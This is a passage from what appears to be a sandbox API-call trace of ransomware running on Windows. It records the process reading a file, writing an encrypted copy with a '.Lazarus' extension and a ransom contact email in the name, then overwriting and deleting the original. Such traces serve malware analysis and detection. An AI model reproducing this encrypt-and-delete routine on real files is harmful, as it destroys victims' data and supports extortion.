(HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0067.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0067.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0067.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0067.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0067.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0067.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0067.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0067.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0067.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0067.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0067.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0067.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0067.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0067.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0067.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0067.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0067.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0067.597] AreFileApisANSI () returned 1 [0067.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0067.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71758 [0067.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 46 [0067.597] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758)) returned 1 [0067.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0067.597] AreFileApisANSI () returned 1 [0067.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0067.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0067.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0067.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0067.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0067.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0067.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0067.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0067.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0067.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0067.597] GetLastError () returned 0x0 [0067.597] SetLastError (dwErrCode=0x0) [0067.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dea8 [0067.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8c430 [0067.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b798 [0067.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0067.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0067.597] GetLastError () returned 0x0 [0067.597] SetLastError (dwErrCode=0x0) [0067.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0067.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0067.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71960 [0067.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0067.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0067.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0067.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0067.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0067.598] AreFileApisANSI () returned 1 [0067.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0067.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd8) returned 0x51398 [0067.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=108 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 108 [0067.598] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0067.598] GetFileType (hFile=0x420) returned 0x1 [0067.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0067.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0067.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0067.599] AreFileApisANSI () returned 1 [0067.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0067.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71688 [0067.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 46 [0067.599] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0067.599] GetFileType (hFile=0x410) returned 0x1 [0067.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0067.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a430 [0067.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0067.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0067.599] GetLastError () returned 0x0 [0067.599] SetLastError (dwErrCode=0x0) [0067.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0067.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0067.599] GetLastError () returned 0x0 [0067.599] SetLastError (dwErrCode=0x0) [0067.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0067.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0067.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0067.600] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0067.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0067.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0067.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0067.602] GetLastError () returned 0x0 [0067.602] SetLastError (dwErrCode=0x0) [0067.602] GetLastError () returned 0x0 [0067.602] SetLastError (dwErrCode=0x0) [0067.602] GetLastError () returned 0x0 [0067.602] SetLastError (dwErrCode=0x0) [0067.602] GetLastError () returned 0x0 [0067.602] SetLastError (dwErrCode=0x0) [0067.602] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.603] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.603] GetLastError () returned 0x0 [0067.603] SetLastError (dwErrCode=0x0) [0067.604] GetLastError () returned 0x0 [0067.604] SetLastError (dwErrCode=0x0) [0067.604] GetLastError () returned 0x0 [0067.604] SetLastError (dwErrCode=0x0) [0067.604] GetLastError () returned 0x0 [0067.604] SetLastError (dwErrCode=0x0) [0067.604] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.604] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.604] GetLastError () returned 0x0 [0067.604] SetLastError (dwErrCode=0x0) [0067.604] GetLastError () returned 0x0 [0067.605] SetLastError (dwErrCode=0x0) [0067.605] GetLastError () returned 0x0 [0067.605] SetLastError (dwErrCode=0x0) [0067.605] GetLastError () returned 0x0 [0067.605] SetLastError (dwErrCode=0x0) [0067.605] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.605] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.605] GetLastError () returned 0x0 [0067.605] SetLastError (dwErrCode=0x0) [0067.605] GetLastError () returned 0x0 [0067.605] SetLastError (dwErrCode=0x0) [0067.606] GetLastError () returned 0x0 [0067.606] SetLastError (dwErrCode=0x0) [0067.606] GetLastError () returned 0x0 [0067.606] SetLastError (dwErrCode=0x0) [0067.606] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x758, lpOverlapped=0x0) returned 1 [0067.606] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.606] GetLastError () returned 0x0 [0067.606] SetLastError (dwErrCode=0x0) [0067.606] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0067.606] GetLastError () returned 0x0 [0067.606] SetLastError (dwErrCode=0x0) [0067.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0067.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0067.607] GetLastError () returned 0x0 [0067.607] SetLastError (dwErrCode=0x0) [0067.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0067.607] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327ef70*=0x760, lpOverlapped=0x0) returned 1 [0067.607] GetLastError () returned 0x0 [0067.607] SetLastError (dwErrCode=0x0) [0067.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0067.607] GetLastError () returned 0x0 [0067.607] SetLastError (dwErrCode=0x0) [0067.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0067.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0067.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0067.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0067.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0067.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0067.607] CloseHandle (hObject=0x420) returned 1 [0067.609] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0067.609] CloseHandle (hObject=0x410) returned 1 [0067.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0067.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0067.609] AreFileApisANSI () returned 1 [0067.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0067.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71bd0 [0067.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x71bd0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 46 [0067.610] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0067.611] GetFileType (hFile=0x410) returned 0x1 [0067.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0067.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0067.611] GetLastError () returned 0xb7 [0067.611] SetLastError (dwErrCode=0xb7) [0067.611] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0067.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0067.612] CloseHandle (hObject=0x410) returned 1 [0067.612] AreFileApisANSI () returned 1 [0067.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0067.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0067.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 46 [0067.612] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll")) returned 1 [0067.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0067.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0067.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0067.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0067.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0067.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0067.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0067.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0067.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0067.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0067.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0067.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b798 | out: hHeap=0x20000) returned 1 [0067.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0067.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0067.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0067.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0067.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0067.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0067.614] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.614] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.614] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4f1, ftLastWriteTime.dwHighDateTime=0x1, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="ƿ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧脐\x07̧비聐萀\x08賂̧")) returned 0 [0067.614] FindClose (in: hFindFile=0x78110 | out: hFindFile=0x78110) returned 1 [0067.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0067.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0067.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0067.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0067.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0067.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0067.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0067.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0067.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0067.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0067.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0067.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0067.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0067.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0067.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0067.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0067.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0067.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0067.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0067.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0067.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0067.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0067.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0067.615] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.615] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.615] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.615] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0067.615] AreFileApisANSI () returned 1 [0067.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1041", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1041", lpUsedDefaultChar=0x0) returned 27 [0067.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0067.615] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.615] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0067.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0067.615] AreFileApisANSI () returned 1 [0067.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0067.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78190 [0067.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x78190, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041") returned 27 [0067.615] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041" (normalized: "c:\\588bce7c90097ed212\\1041"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.615] GetLastError () returned 0x5 [0067.615] GetLastError () returned 0x5 [0067.615] SetLastError (dwErrCode=0x5) [0067.615] GetLastError () returned 0x5 [0067.615] SetLastError (dwErrCode=0x5) [0067.615] GetLastError () returned 0x5 [0067.615] SetLastError (dwErrCode=0x5) [0067.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78190 | out: hHeap=0x20000) returned 1 [0067.616] AreFileApisANSI () returned 1 [0067.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0067.616] RtlAllocateHeap 